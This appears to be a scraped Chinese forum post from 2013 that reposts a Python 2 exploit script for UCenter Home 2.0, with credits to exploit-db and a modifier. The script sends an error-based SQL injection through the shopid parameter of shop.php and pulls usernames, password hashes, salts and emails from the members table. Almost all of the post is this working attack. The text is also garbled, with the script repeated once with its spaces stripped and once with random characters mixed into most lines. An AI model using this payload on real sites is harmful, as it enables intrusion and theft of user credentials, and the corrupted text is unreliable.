#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
* Z# c" o% o0 G/ _6 x , E/ R1 O# S1 ~* B
0 D7 U! k+ _/ ^ b" {' ~#!/usr/bin/env python
+ N) y0 N, [) b 5 X" R9 a2 E! _( C
import sys 8 {* r% n# `. X0 u0 h
import urllib2 ! e+ e9 x3 i @+ @0 s8 h3 W
import re
K, Q2 S+ R) w2 I. g s/ b
, n0 p2 B+ b$ }- {6 L( d4 {$ ?def info():
) ^8 W* x& g! g6 m& a# Z; { print 'From:http://www.exploit-db.com/exploits/14997/' 8 {1 @" {0 G w2 v7 u
print 'http://www.hake.cc/Web_loudong/'
/ {5 v' @8 } E y print 'changed:qiaoy'
3 }* P6 `2 O' g R print 'exp:'
( B9 [' q* \) j print ' ./UCenter_Home_2.0.py site' 6 X4 o& ~* d% ]8 H
3 @) f& \. g7 f2 b) Q+ C6 ?9 R! jdef main():
5 v7 J z6 \& g5 t5 n if len(sys.argv) != 2:
4 r% y- c, n, Y4 f info()
' a# v% x& V% g* U else:
8 T/ X' H% Q* [0 y, p. F" S9 H site = sys.argv[1] 0 E$ h& Y. K( P4 f5 K% j9 C
if site[0:7] == 'http://': ) ^+ e) {/ h# h. m
sitesite =site
7 E' {& _+ Y5 W4 K, o elif site[0:8] == 'https://':
+ Y% e! k# S: d sitesite = site
% n8 j p1 R& v9 O/ j% W. Y else: - l! J' V4 w+ K( z
site = 'http://'+site ' n8 D4 I3 Y" p4 z
try:
4 }2 U0 m9 T: U9 t6 P7 V url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
' ^/ z; U+ s* e3 A8 B Value = urllib2.urlopen(url).read() b# E/ o9 h, T K4 X: ?1 m! d3 w1 q0 s
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
" u% Q3 V& z9 Q9 P# Y hacked = Msg.split(':') ' c# m2 B* Q( h* i: }: V
print 'Name: '+hacked[1] , C' s4 `. `% f2 x0 C C8 x" S7 a
print 'Passwd: '+hacked[2] ( P3 v3 j' U! m) E w0 b
print 'salt: '+hacked[3] 9 W- B7 J- w( h' |5 y2 c3 `5 G
print 'email: '+hacked[4]
( R1 a! T9 P- V6 K' c6 P except: $ H# `+ T2 a# M4 G b3 |/ b6 `! i
print 'Sorry,I can\'t work............' ! X0 o( R* i, f+ q/ I$ C
3 X( d* w& A: S. B
if __name__ == '__main__':
. q. Z8 j) ^/ Y main() |
发表于 2013-1-23 09:18:17
收藏
支持
反对